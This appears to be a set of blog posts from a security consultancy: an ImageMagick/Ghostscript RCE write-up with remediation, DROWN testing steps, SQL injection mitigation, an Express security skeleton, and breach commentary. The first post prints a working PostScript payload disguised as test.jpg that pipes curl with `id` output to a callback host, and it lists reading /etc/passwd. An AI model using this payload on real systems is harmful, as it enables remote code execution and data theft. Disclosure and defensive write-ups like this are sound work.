ImageMagick RCE Take 2

Introduction

A new bypass for Ghostscript, which ImageMagick uses by default to process PostScript, was published yesterday and allows attackers to achieve remote code execution. It is similar in nature to the ImageTragick bug that plagued ImageMagick, where image files containing PostScript were sent to ImageMagick and, when converted, executed commands against the OS.

As part of our continuous security efforts for our clients, we watch for vulnerabilities that could affect them and confirm with each client whether they are affected. This was one of those times.

We discovered one of our clients was vulnerable to this exploit. We wrote up the issue and submitted it to them within 24 hours of it being released to the public, and they were able to fix it in minutes.

Security Details / Walkthrough

One of our clients uses ImageMagick to handle image conversions, such as creating thumbnails for their website.

The following payload was used as an image upload across all the upload functions on the dev website:

Filename: test.jpg

%!PS
userdict /setpagedevice undef
save
legal
{null restore} stopped {pop} if
{legal} stopped {pop} if
restore
mark /OutputFile (%pipe%curl${IFS}callback.softwaresecured.com/`id`)
currentdevice putdeviceprops

From previous testing with the client, we already knew which OS the application was running on, so we were comfortable using curl. While testing, we started with a call to nslookup, since it is available on both Windows and Linux. We then uploaded this POC file to the client's website.
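As an aside, a payload like this can be sanity-checked locally before it ever goes near a client environment. A minimal sketch, assuming ImageMagick is installed with its Ghostscript delegate and that the callback host in the payload has been swapped for a server you control:

# test.jpg contains the PostScript payload above; any conversion will do
convert test.jpg test.png

If the local Ghostscript is unpatched, the conversion hands the PostScript to Ghostscript, the %pipe% device runs curl, and the output of id appears in your callback server's access logs.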

The upload request looks something like the following:

POST /file HTTP/1.1
Host: www.helloworld.com
…snip…
Connection: close

-----------------------------184561271817366
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg

%!PS
userdict /setpagedevice undef
save
legal
{null restore} stopped {pop} if
{legal} stopped {pop} if
restore
mark /OutputFile (%pipe%curl${IFS}callback.softwaresecured.com/`id`)
currentdevice putdeviceprops
-----------------------------184561271817366--

Which gave back the following response:

HTTP/1.1 400 Bad Request
…snip…
Connection: close

{"errors":{"image":"Image is not valid"}}

On our server, we watched the logs for the curl request coming from the client's web server, waiting to see whether the user's ID was included in the URL and whether we received any call at all. After trying many different upload functions, here is the callback we received:

GET /www-data HTTP/1.1
User-Agent: curl/7.35.0
Host: callback.softwaresecured.com
Accept: */*

Success! We have remote command execution on the client's web server, and the user running the web service is "www-data". Other commands that worked included:

  • uname -a
  • cat /etc/passwd
  • nslookup

Dangers of Insecure Defaults and Remediation

Luckily for the client, when we tried to cat the /etc/shadow file on the server, we received no data back. This means the web service runs as a lower-privileged user.

As of the writing of this post, there is no official fix. That being said, there is an official workaround: update the policy.xml file, which configures ImageMagick. The following is taken from the post on www.kb.cert.org:

Disable PS, EPS, PDF, and XPS coders in ImageMagick policy.xml

ImageMagick uses Ghostscript by default to process PostScript content. ImageMagick can be controlled via the policy.xml security policy to disable the processing of PS, EPS, PDF, and XPS content. For example, this can be done by adding these lines to the <policymap> section of the /etc/ImageMagick/policy.xml file on a Red Hat system:

  • <policy domain="coder" rights="none" pattern="PS" />
  • <policy domain="coder" rights="none" pattern="EPS" />
  • <policy domain="coder" rights="none" pattern="PDF" />
  • <policy domain="coder" rights="none" pattern="XPS" />
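Once policy.xml has been updated, the active policy can be checked with ImageMagick itself. A quick sketch (the exact output format varies between ImageMagick versions):

convert -list policy

The PS, EPS, PDF, and XPS coders should now be listed with rights of none, and re-uploading the earlier test.jpg should fail the conversion instead of reaching Ghostscript.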

Timeline

  • Tuesday, 21 Aug 2018 05:46:26 -0700: Vulnerability Published
  • Wednesday, 22 Aug 2018 11:21:00 -0500: Vulnerability Confirmed on Client Website
  • Wednesday, 22 Aug 2018 12:26:00 -0500: Vulnerability Reported to Client
  • Wednesday, 22 Aug 2018 13:08:00 -0500: Vulnerability Fixed on All Servers


Our Security Assessment Process: Attack Simulation Approach

Attack Simulation Approach

The term security assessment describes the process of auditing a system, such as a network or an application, for the purpose of finding security flaws that could lead to cyber attacks. There are several ways to perform a security assessment of a system.

At Software Secured, we follow an attack-simulation approach, combining the latest hacking techniques, manually executed by our experienced engineers. In addition, we apply our unique process, checklists, and hacking book, giving you the best coverage and depth in the industry.

We focus on optimizing three factors:

1. Coverage: we use several techniques to automate the discovery of basic attacks. We continue pushing the boundaries of what tools are capable of finding, giving us the chance to spend more manual testing time on harder-to-discover vulnerabilities, such as business logic vulnerabilities.

2. Depth: we follow a stringent process, combined with a checklist of 120+ security items that are reviewed in every assessment. Our checklist is continuously updated with the most recent techniques to ensure that as many code paths in the application as possible have been tested.

3. Attack Simulation: we spend a fair amount of time understanding the business purpose of the application, allowing us to go deeper and understand the attacker's motivation. This uncovers potential vulnerabilities that would otherwise stay hidden.

Given these three areas of focus, we follow a six-step process for every assessment:

1. Kickoff Meeting

We begin with a kickoff meeting with the client to understand the business purpose of the application; this helps us better understand who is most likely to attack it.

2. Threat Modelling Exercise

A threat modelling exercise is performed next. Threat modelling breaks down the system and outlines how and where an attacker can pose a threat. The artifact of this step is a set of application-specific test cases and attacks unique to the system under test.

3. Automation

We use best in class tools customized to fit the attack simulation process, combined with our proprietary tools and scripts to provide you with a more thorough assessment.

4. Attack simulation

Our security engineers apply their collective hacking experience combined with latest attack techniques to simulate what an attacker would do in a real life hacking scenario.

5. Coverage Control

Using our checklist of 120+ security items helps ensure all bases are covered. This ensures that most of the application's code paths are tested and maximum coverage is maintained for every assessment.

6. Reporting

Finally, our team compiles the list of issues into an actionable report. Each issue is explained in detail along with its associated risk level, steps to reproduce, proof of concept, and detailed remediation steps.

Our attack-simulation approach to security assessment can be delivered as a one-off engagement or continuously managed.

Introduction to SQL Injection Mitigation

What is SQL Injection?

The popularity of Structured Query Language (SQL) injection attacks has grown significantly over the years, and employing relevant mitigation practices will help keep your application off the growing list of insecure applications implicated in significant data breaches. Despite SQL's release nearly 30 years ago, SQL injection has been responsible for millions of lost records, with damages also in the millions, earning itself the #1 spot in the 2017 OWASP Top 10. One such attack occurred in 2008, when Heartland Payment Systems (HPS) was compromised as a result of an SQL injection vulnerability, exposing 138 million credit cards and causing $140 million in damages. Secure use of SQL could have prevented this.

SQL injection is an attack that occurs when specifically constructed input provokes an application into misconstructing a database command, resulting in unforeseen consequences. Those consequences can include the circumvention of authentication and authorization mechanisms, allowing the attacker to add, modify, delete, and retrieve records, compromising the integrity of a database and the applications it provisions.

Cultivating an environment which enables secure coding practices that prevent SQL injection vulnerabilities from making their way into an application is possible. Although this article focuses on outlining the technical practices which can prevent injection attacks, developing an organization-wide, security-minded culture should also be an objective. Education, design, and code review are just a few of the components within the Software Development Life Cycle (SDLC) that will contribute to an application's ability to successfully defend itself from SQL injection attacks, and to its overall success.

SQL Injection Mitigation Strategies

Secure Coding & SDLC

Security-driven programming practices will always be the best defense against SQL injection attacks. Ensuring developers are aware of the risks, tools, and techniques that can mitigate SQL vulnerabilities is your first and best line of defense. However, cultivating the use of secure programming techniques will also require a commitment to their implementation throughout the SDLC. Developing security-minded education, planning, testing, and review practices are just a few components within an SDLC that will help prevent SQL injection vulnerabilities from making their way into your application.

Input Validation & Sanitization

Client side input sanitization and validation should only be considered a convenience for the end user, improving their user experience. For example, it could prove useful to provide feedback on a proposed username, indicating whether or not it will meet the application’s criteria. However, client side sanitization and validation can be bypassed, and as such, server side solutions should be employed.

Server-side sanitization and input validation ensure that data supplied by the user does not contain characters, like single or double quotes, that could modify an SQL query and return data not intended in the application's design. Specifically, validation makes sure that user-supplied data satisfies an application's criteria, while sanitization refers to the process of modifying user input so that it satisfies those criteria. Combining both results in a scenario where single quotes contained in a user-submitted string are modified or removed by sanitization, and the result is then validated to ensure no single quotes remain, satisfying the application's requirements.

Stored Procedures & Parameterization

Query parameterization occurs when stored procedures, defined as sub-routines an application uses to interact with a relational database management system (RDBMS), employ variable binding. Variable binding is a process that requires the definition of an SQL statement prior to the insertion of variables, allowing for a clear delineation of code and user input. Essentially, prepared statements that parameterize queries protect the intent of an SQL query. For example, if an attacker were to submit the string ' OR '1'='1, a prepared statement would literally attempt to match the string ' OR '1'='1 against a field in the database, rather than evaluating the boolean expression.

// Stored Procedure Example (Java)
// Source: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

String custname = request.getParameter("customerName"); // This should REALLY be validated
try {
     CallableStatement cs = connection.prepareCall("{call sp_getAccountBalance(?)}");
     cs.setString(1, custname);
     ResultSet results = cs.executeQuery();		
     // … result set handling 
} catch (SQLException se) {			
     // … logging and error handling
}

Prepared Statements

Prepared statements are essentially server-side parameterized queries and, when used with secure coding techniques, can produce equally secure code. Simply put, the construction of a secure prepared statement results in the automatic parameterization of user input. However, the use of dynamically constructed queries should be avoided unless special libraries and techniques are used to protect against the gaps in security coverage that might emerge. Libraries like opaleye for Haskell and SQL Builder for Python can be used to this effect. If dynamic SQL must be used, proper sanitization and validation of user input will be necessary to safeguard the application.

The following code example uses a PreparedStatement, Java’s implementation of a parameterized query, to execute the same database query.

// Prepared Statement Example (Java)
// Source: https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet

String custname = request.getParameter("customerName"); // This should REALLY be validated too
// perform input validation to detect attacks
String query = "SELECT account_balance FROM user_data WHERE user_name = ? ";
PreparedStatement pstmt = connection.prepareStatement( query );
pstmt.setString( 1, custname);
ResultSet results = pstmt.executeQuery( );

Program Analysis Techniques & Proxies

Although the creation of secure SQL code should be your first priority, there exist tools that can facilitate the process. SQL specific static analysis tools like SQL Code Guard (https://www.red-gate.com/products/sql-development/sql-code-guard/) can analyze a database and its queries against a set of rules to reveal vulnerabilities. Other tools like SQLProb operate between an application and its database acting as a proxy which intercepts, analyzes, and discards potentially malicious queries before they reach the database. It should be noted that tools which rely on predefined patterns to identify malicious queries become less effective as their rulesets age and new attacks are discovered.

Final Thoughts

With the relative ease of executing SQL injection attacks and their compelling consequences, mitigation should be a priority for all application developers. With numerous defensive techniques and tools available, in the form of stored procedures, parameterization, program analysis techniques, and even black-box tools like OWASP's Zed Attack Proxy, developers should have no trouble improving the security of their applications and protecting their users against SQL injection attacks.


There is More to Application Security than Bulletproof Code

In recent months, momentum has been building for developers to write more secure code for their applications. While writing secure code is vital to the security of an organization, it's not the final word in creating applications resistant to attacks.

A number of potential run-time flaws can be identified and corrected while source code is being written. Nevertheless, there may be errors in an application that can only be discovered when the application is running or under attack. Such errors may stem from code paths being taken given the current data and the current state of the application, how memory is used, how an application functions over time or even something as simple as how a program displays error messages.

When a developer reviews how their application is handling errors, they may see nothing insecure about the code and indeed, there may be nothing insecure about it. However, when the application runs and an error is produced, the message explaining the error may be creating a security risk that wasn’t apparent to a programmer concentrating on code alone.

Error messages need to negotiate narrow straits. They need to be meaningful to a user and give support staff the diagnostic information needed to correct the errors, but not give too much information to a hacker. For example, when a user commits an error while logging into a system, an error message such as "User Name Correct, Password Incorrect" is to a hacker what a Milk Bone is to a dog. Instead of wondering whether the credentials they're trying are any good at all, the attacker knows they have a valid username and can focus on cracking the password. Better yet (for the attacker), stolen credentials can be used against new targets; the only piece of information needed is the username or email.

Open Source Headache

Third-party dependencies, and open-source code in particular, continue to be a security headache. Securing native code alone isn't enough to protect applications, because developers don't completely control all the code used by their programs. Up to 90 percent of an application can be made up of third-party components. A developer can write rock-solid secure code for their apps, but they still don't know how secure those third-party components are. Many of those components contain open source code with flaws. It's estimated that 50 percent of the world's largest companies use applications built on open source components with vulnerabilities.

Vulnerabilities in open source components can be a real problem for developers, especially developers of web applications. “Component vulnerabilities can cause almost any type of risk imaginable, ranging from the trivial to sophisticated malware designed to target a specific organization,” the Open Web Application Security Project noted at its website. “Components almost always run with the full privilege of the application, so flaws in any component can be serious.”

Making matters worse, OWASP continued, development teams don't focus on keeping the components and libraries they use up to date. "In many cases, the developers don't even know all the components they are using, never mind their versions," it added. "Component dependencies make things even worse."

What's more, unlike commercial software makers, who keep their customers apprised of recently discovered flaws and push fixes to them, most organizations don't have a reliable way of being notified of zero-day vulnerabilities or available patches for the open source components they use.

Middleware and Config Vulnerabilities

Not only do apps work with vulnerable components, they may also be called on to work with middleware. Middleware is useful because it mediates network services to applications through devices like web and application servers. However, middleware can create its own security problems, problems that won't be apparent from a code review of the application alone.

For example, if an application contains authentication and access privilege control problems with the middleware, that won’t be discovered until the application runs and interacts with the middleware. The same is true for potential security vulnerabilities that could lead to interception or viewing of information in a workflow or the integrity of transactions on the network.

Errors in configuration files can be another fertile area for vulnerabilities that won’t become apparent by securing code alone. A programmer can be very meticulous about security, but if their application is misconfigured it can be as vulnerable as a sloppily coded one. Moreover, the problem can be exacerbated by many configuration settings defaulting to values that introduce vulnerabilities into the application or the middleware it’s using.

Making matters worse, web application config files can be changed at any time — even after an application is in production. A well-meaning administrator could open an application to attack by diddling a config file.

Any organization concerned with protecting its information assets needs its development teams to write secure code, but it can't stop there. It has to test apps as they're running, too.

How to Confirm Whether You are Vulnerable to the DROWN Attack

Another OpenSSL vulnerability has been uncovered. The new vulnerability is yet another in a series found lately in the OpenSSL library, a toolkit implementing the SSL v2/v3 and TLS protocols with full-strength cryptography worldwide.

The library, which powers about 5.5 million websites, has seen several vulnerabilities lately, coming on the heels of blockbusters like Heartbleed and Shellshock. The new DROWN vulnerability follows the same pattern as its predecessors, getting its own website and logo here: https://drownattack.com/

You are vulnerable if one or both of the following conditions is true:

1. A server in your network “enables” traffic over SSLv2
2. Another server that enables “SSLv2” shares a key with a server that does not.

At Software Secured, we provide managed web application security services. We focus on continuously testing web applications against security flaws such as the OWASP Top 10 and more. Our services also entail notifying clients about zero-days in third-party libraries used by their applications. As part of this service, we started the Software Secured standard procedures to confirm the reported vulnerability.

The DROWN team provided a utility, http://test.drownattack.com, to help test whether domains are vulnerable, but we found this tool reported too many false positives. So Software Secured has documented an alternative process to confirm whether you are vulnerable to DROWN.

Here are the steps you need to follow in order to independently confirm whether you are vulnerable to the DROWN attack.

1 – You need to do the following for all your externally available services that could be communicating over SSL (e.g. web, FTP, SMTP, etc.). We assume that you have an inventory of all your public IPs. Just in case you don't, one way to build one is using DNSRecon:

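For example, a minimal sketch (assuming dnsrecon is installed, with example.com standing in for your domain):

dnsrecon -d example.com -t std

The standard enumeration pulls the common record types (NS, MX, A/AAAA, SRV), which is usually enough to seed an IP inventory.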

2 – For each IP, you need to list all the services that communicate over SSL. First, list the open ports per IP:

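A sketch of that step (the IP below is a placeholder; adjust to your own addresses and ranges):

nmap -sV -p- --open 192.0.2.10

Here -sV fingerprints the services, -p- covers all 65,535 ports, and --open limits the output to ports that actually answered.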

3 – Ensure that your local OpenSSL supports SSLv2, as most OpenSSL distributions disable SSLv2 and SSLv3 (as they should); thanks to Dan Astor for the tip. One quick way to test is to force an SSLv2 connection to the domain in question:

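A sketch of that check, with example.com standing in for the host under test:

openssl s_client -connect example.com:443 -ssl2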

If you get the error "unknown option -ssl2", then you don't have SSLv2 enabled locally. This would give you false negatives, as your local OpenSSL client wouldn't be able to negotiate an SSLv2 connection with the server even if the server has it enabled. To enable SSLv2, please follow the instructions here: http://forums.kali.org/showthread.php?98-Adding-support-for-SSLv2-for-SSLScan-and-OpenSSL-testing

4 – To double-check the results, we used SSLyze. Bingo, the service at this IP does support SSLv2 ciphers:

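For reference, a sketch of that scan (assuming an SSLyze release that exposes the --sslv2 scan option, and using the same IP as in the next step):

sslyze --sslv2 66.6.224.76:443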

5 – Using OpenSSL itself also confirms the results, using the following command:

openssl s_client -connect 66.6.224.76:443 -ssl2

Conclusion:

  1. Keep in mind that this vulnerability is in a protocol that was deemed problematic at least 20 years ago.
  2. This vulnerability is more problematic if one of the servers in the network supports the faulty version. This can be used to intercept traffic to other servers that aren’t supporting it.
  • Although Software Secured found a very high ratio of false positives using the DROWN team's check utility compared to our own testing lab, it is highly recommended that you don't take any chances and test your own servers.
  • Make sure to test ALL your servers, including web servers, mail servers, FTP servers, etc.

Update:

Some readers indicated that it is possible to exploit this vulnerability even if SSLv2 is disabled, and that merely supporting SSLv2 could potentially be problematic, so I decided to clear this up with the DROWN team and sent the following email:

Nice work. I just had a quick question. In order for a server to be vulnerable, one of the following conditions must happen:

1. The server “enables” SSLv2
2. Another server that enables “SSLv2” shares a key with the server that does not.

If all the servers in a network didn’t enable SSLv2, then the vulnerability can’t be exploited, can you confirm?

And I received the following reply 40 minutes later:

yes this is correct. But note that even a single SSLv2 enabled server (running on a different port or IP) using the same RSA key makes your server vulnerable. If you can confirm that all your servers are configured correctly to disable sslv2, you are OK.

Setting Up a Secure Instance of Express JS (GitHub Repo)

In a previous blog post, I mentioned ways to secure your ExpressJS instance. This included both using third-party modules and modifying the default configuration of Express.

The blog post received great feedback, so we decided to create a skeleton that shows how to handle the security concerns it addressed. The skeleton is a great starting point for a secure ExpressJS application, and this post covers the details of getting started with it and what it handles for you out of the box.

The source code for the skeleton can be found in the dead-simple-express repository.

Check out the secure branch for all the details.

Getting Started

The following instructions are done with an OSX machine in mind, so modify accordingly.

Make sure you have MongoDB installed:

brew install mongodb

To use:

git clone https://github.com/jeremybuis/dead-simple-express.git && cd dead-simple-express && rm -rf .git
npm install
bower install
npm start

Navigate to http://localhost:4000 to view the basic page, keeping in mind it's a starting-point project, so things are pretty bare.

What you get in the skeleton:

  • A rock-solid starting point for writing an ExpressJS server-side web app
  • Sane defaults, including Express configuration and security-focused settings
  • A logical app structure with a nice separation of concerns between files
  • Proper error handling
  • Security-minded modules to handle the issues addressed in the last blog post
  • A build script for super dev powers using Gulp

Security issues it covers:

  • Cross-site Request Forgery (CSRF)
  • Security headers using helmet
  • HPP or HTTP Parameter Pollution
  • Content length validation
  • Downgraded user privileges
  • Secure cookies
  • Proper env variable loading
  • Removal of x-powered-by header
  • Generic cookie name
  • User accounts with bcrypt password handling

Recommended Setup

My preference for setting something like this up in production is to put your Express server behind an nginx proxy.

The proxy handles SSL termination and routes traffic to your Express server. It also handles serving static resources. This way, your Express app only handles app-specific routes that have business logic attached to them.

This setup also means you don't have to run the Express instance as root, since it doesn't need to be bound to a port lower than 1024.

That's all for now, folks.

The Canadian Government Outage and Raising the Profiles of Simple Attacks

The Canadian government was hacked! The Globe and Mail reported a few days back:

A cyberattack crashed federal government websites and e-mail for nearly two hours Wednesday – an incident that raises questions about how capable Ottawa’s computer systems are of withstanding a sustained assault on their security.

It is not news that cyber attacks are being used for more than just stealing information. Showing defiance and protesting, as Anonymous and the Syrian Electronic Army do every now and then, is another example. Hacking is also used for intelligence gathering, spying, public humiliation, and much more.

The question is: are attackers getting better at attacking, or are we getting worse at defending?

The answer is complicated, but attackers are definitely getting better. Not only are they improving in terms of skills and tools, they are also getting smarter and more sophisticated. The most interesting thing is that they are raising the profiles of the same old attacks.

There are hardly any attacks nowadays that we never knew existed before; maybe once in a while a new technique for an old attack appears. What we are mostly dealing with are the same old attacks, given added sophistication, complexity, or a facelift. Several things can raise the profile of an attack, turning an ordinary attack into something that makes headlines everywhere.

Please keep in mind that I am not discussing state-sponsored attacks here, because I think they are a league of their own and most organizations can't prevent those kinds of attacks.

1. The Target: "Go big or go home" definitely holds in the hacking world. The primary factor in raising the profile of an attack is the target the attackers are after, or the organization the attackers exposed. The IRS attack last month was definitely a big deal, as was the breach that caused the identity of every single federal employee to be stolen. The RSA attack was another high-profile one because of the target; in that case, the stolen data included the seeds for SecurID, used by many government organizations for two-factor authentication.

2. The Timing of the Attack: Distributed Denial of Service is a very simple attack. Imagine tens (or hundreds) of thousands of browsers sending, and continuing to send, requests to the exact same set of servers at exactly the same time. What is going to happen? Those servers will go down, because they can't handle that kind of traffic. Attackers can do this by controlling botnets; as a matter of fact, botnets are available for rent for as little as $200-$300 a day! Every single federal or provincial government faces a ton of attacks every single day. What made this particular attack against the Canadian government so visible worldwide is the timing:

A. Bill C-51 had just passed in the House of Commons.

B. The federal elections are coming up in October of this year. Perfect timing for visibility for the group Anonymous.

3. Combining Attacks: It is not new that attackers combine several hacking techniques in a single attack. It is typical for attackers to launch a multistage attack where they first gain a foothold inside the organization, probably through an unrestricted zone (marketing, DMZ, etc.), and use that to elevate their foothold and gain privileges to other, more restricted zones until they get to what they are looking for. It is common, too, for malware to exploit several vulnerabilities or zero-days in a system. The best example is Mikeyy Mooney's worm, which hit Twitter in 2009 and leveraged a combination of Cross-site Scripting and Cross-site Request Forgery. What we are seeing more of these days is the number of zero-days used, and the speed with which zero-days are used in the wild. It was reported that attackers exploited the Drupal SQL injection back in November 2014 just 8 hours after the initial disclosure; 8 hours is not enough for most organizations to take any kind of action, or in some cases even get notified about the attack.

4. Branding of Attacks: Remember Heartbleed? It was a simple bug where the code did not check the boundaries of an allocated buffer, and this led to attackers gaining access to unencrypted server memory; the best explanation is found in this cartoon. Now, why did it make the headlines, and why was it such a big deal? It did indeed affect half a million websites, but I don't think this was the main reason. Here is my proof: Drupal suffered a massive SQL injection attack a few months later that affected about 12 million sites, and the impact was grave, since attackers could get a shell on the server, which in security terms means "game over", attacker wins. So as far as impact and reach go, the Drupal attack was definitely bigger. Now ask 100 people in different departments of any organization: chances are more people will remember Heartbleed, and very few will remember or even recognize the Drupal SQL injection attack. Why? Heartbleed had a name and a logo. It had a brand!

5. Branding of Attackers: 10 years ago, all the bad guys were labeled either hackers or blackhats. Now that hacking has gone mainstream, attackers are grouped: either they name themselves or they are given a name. There are hacktivists such as the Anonymous group, which mainly protests issues related to free speech, human rights, or freedom of information. The Syrian Electronic Army is a group that claims responsibility for defacing or otherwise compromising scores of websites that it contends spread news hostile to the Syrian government, or fake news. APT (Advanced Persistent Threat), while not a group, is a name given to a specific style of hacking used by state-sponsored attackers, though it is usually attributed to Chinese attackers.

Now that attackers are getting better, organizations' defences must get better too. There are several things that organizations can do to protect themselves against these kinds of attacks:

1. Threat Assessment: the very first thing organizations should do is understand who their primary adversaries are. Who is most likely to attack your organization? What does this attacker look like? What are their capabilities, what are they looking to do, and what kind of tools and skill set do they usually have? Answering these questions will focus your efforts on what should be done and, more importantly, what should not be done.

2. Defence in Depth: we can't stress enough the importance of defence in depth. When you go on a business trip and check in to your hotel room, how many locks do you secure before you go to sleep? All of them! Why? Isn't one enough? The truth is, there is no perfect security system, but the more good security controls you use, the harder it is for the attacker to infiltrate your system. The harder it is to infiltrate, the less motivated the attacker will be to attack you versus the next target. And the more time it takes a determined attacker to exploit your organization, the higher the chance your intrusion detection systems will notify you and you can take action in time.

3. Cyber Security Strategy: security is not only an IT problem; it is a business risk. Without an organization-wide strategy that covers everything from governance, architecture, design, and implementation through testing and deployment, security will remain an IT problem, a problem that is much bigger than just IT, and the defences will always fall short regardless of the budget thrown at them.

4. Continuous Assessment: attackers are pounding your defences on a daily basis to find holes, crack them, and see what they can get and what they can do with it. The best organizations do this proactively themselves, leaving nothing for attackers to find. Test your own defences and push them to the limit, because if you don't, hackers will.

Reading through the IRS Hack: Failures and Analysis

The IRS has reported that thieves stole tax information from 100,000 taxpayers, pretty disturbing news on multiple levels. The first is that an organization like the IRS, which has more information on every single citizen (probably more than the citizens know about themselves), got hacked, and a data breach of that magnitude is something to worry about. The other interesting level is that the attackers already had the victims' Social Security Numbers, address information, dates of birth, and tax filing status.

The "Get Transcript" feature was taken offline temporarily after the attack, so we didn't have a chance to look at it closely. However, several resources are available online that pretty much sum up how it works.

Several Notes on the Application's Security Design and Architecture:

1. Authentication Failure: good authentication requires more than one of the following: "Something You Know", "Something You Have", and "Something You Are". A brief description of these can be found here. The IRS used four "Something You Know" factors; beyond the Social Security Number, the address, date of birth, and tax filing status don't really add much security. Apparently, the attackers didn't even have to guess, as they already knew this information. The question here is: if they already knew what they were stealing, what's the point? This question is answered later, with more to come in the analysis section.

2. Lack of Proper Attack Resistance Capabilities: attack resistance is the application's capability of preventing the attacker from executing an attack against it. To be fair, very few applications get this right, and most organizations outsource it to perimeter security, and to intrusion detection tools in particular. It was reported that the IRS had several IP filters preventing requests after several "hundreds" of requests had been made from the same IP. The problem with this technique is that, on its own, it does not work, because attackers can randomize their IPs. While IPs are still important in detecting automated attacks, timing and geolocation are also important factors.

3. Using Predictable Data in Authentication is Bad: using the Social Security Number as part of the authentication process is a big no-no in sound security architecture practice for several reasons. First, the possible valid Social Security Numbers are limited; there are several websites that explain the structure of a valid Social Security Number and others that will help you generate valid ones, so generating valid numbers is extremely simple. Now, most probably the attackers didn't go that route and got this data from somewhere else. Nonetheless, using predictable data in the authentication process is definitely a bad idea. Additionally, having the user enter their Social Security Number there could raise a bunch of other issues, such as caching, shoulder surfing, and more.

Why Did They Do It?

Again, the big question is: if the attackers already had the victims' Social Security Numbers, dates of birth, addresses, and filing statuses, then what's the point? What else could they gain from this hack? The answer is a lot…

1. Better Price for the Data: it turns out that a Social Security Number is only worth something ($3 - $5 each, according to CNNMoney) if it is packaged with a full name. Assuming the attackers stole the PII (SSN, DoB, and street info) but didn't have the victims' names, full addresses, and marital status, guess where they would find this information? In the transcripts. A sample transcript contains all the data the attackers would need to make a good sale of about $300,000 - $500,000.

2. Fraud: the IRS reported the following:

“In all, about 200,000 attempts were made from questionable email domains, with more than 100,000 of those attempts successfully clearing authentication hurdles,”

This is a 50% success ratio (100K successes out of 200K trials), so could this have been a data cleansing operation? The information was stolen from somewhere, but it didn't include enough to perform a full-scale fraud operation. The IRS paid identity thieves $5.2 billion in 2011 alone, and according to The Chicago Tribune:

“The agency is still determining how many fraudulent tax refunds were claimed this year using information from the stolen transcripts. Koskinen provided a preliminary estimate, saying less than $50 million was successfully claimed.”

3. Identity Theft:
With almost all the information a thief needs to steal someone's identity, nothing stops them now from launching identity theft attacks. Adding insult to injury, according to the 5th annual study conducted by the Ponemon Institute, a Michigan-based research center, medical identity theft rose sharply in 2014, with almost half a million reported incidents. The compromise of healthcare records often results in costly billing disputes. Of course, regular identity theft is also a possibility, but the high success ratio (100,000 successful attempts out of 200,000) suggests that the data used was fresh, which brings to mind the Anthem health insurance hack.

The bottom line is that it does not have to be like this; these attacks could be avoided with simple, or with more comprehensive, security approaches. The billions lost to attackers and fraudsters could be put to better use, with only a fraction of that amount spent on security in the first place rather than on covering up and dealing with the damage.